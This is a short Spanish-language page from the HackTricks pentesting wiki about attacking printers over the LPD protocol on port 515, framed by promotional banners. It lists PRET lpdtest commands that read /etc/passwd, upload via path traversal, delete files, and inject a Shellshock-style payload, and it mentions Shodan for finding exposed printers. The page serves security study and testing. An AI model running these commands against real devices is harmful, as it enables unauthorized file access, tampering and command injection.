3.7 KiB
Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!
Otras formas de apoyar a HackTricks:
- Si quieres ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF, consulta los PLANES DE SUSCRIPCIÓN!
- Consigue el merchandising oficial de PEASS & HackTricks
- Descubre La Familia PEASS, nuestra colección de NFTs exclusivos
- Únete al 💬 grupo de Discord o al grupo de telegram o sígueme en Twitter 🐦 @carlospolopm.
- Comparte tus trucos de hacking enviando PRs a los repositorios de github de HackTricks y HackTricks Cloud.
El protocolo Line Printer Daemon (LPD) fue originalmente introducido en Berkeley Unix en los años 80 (más tarde especificado por el RFC1179).
El daemon se ejecuta en el puerto 515/tcp y se puede acceder a él utilizando el comando lpr
. Para imprimir, el cliente envía un archivo de control definiendo el trabajo/usuario y un archivo de datos que contiene los datos reales a imprimir. El tipo de entrada del archivo de datos se puede establecer en el archivo de control eligiendo entre varios formatos de archivo. Sin embargo, depende de la implementación de LPD cómo manejar realmente los datos de impresión. Una implementación popular de LPD para sistemas operativos similares a Unix es LPRng. LPD puede ser utilizado como un medio para desplegar trabajos de impresión maliciosos en PostScript o PJL.
Las herramientas lpdprint
y lpdtest
están incluidas en PRET. Son una forma minimalista de imprimir datos directamente a una impresora compatible con LPD o descargar/subir/eliminar archivos y más:
lpdprint.py hostname filename
lpdtest.py hostname get /etc/passwd
lpdtest.py hostname put ../../etc/passwd
lpdtest.py hostname rm /some/file/on/printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
lpdtest.py hostname mail lpdtest@mailhost.local
Si quieres aprender más sobre hackear impresoras lee esta página.
Shodan
puerto 515
Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!
Otras formas de apoyar a HackTricks:
- Si quieres ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF revisa los PLANES DE SUSCRIPCIÓN!
- Consigue el merchandising oficial de PEASS & HackTricks
- Descubre La Familia PEASS, nuestra colección de NFTs exclusivos
- Únete al 💬 grupo de Discord o al grupo de telegram o sígueme en Twitter 🐦 @carlospolopm.
- Comparte tus trucos de hacking enviando PRs a los repositorios de github HackTricks y HackTricks Cloud.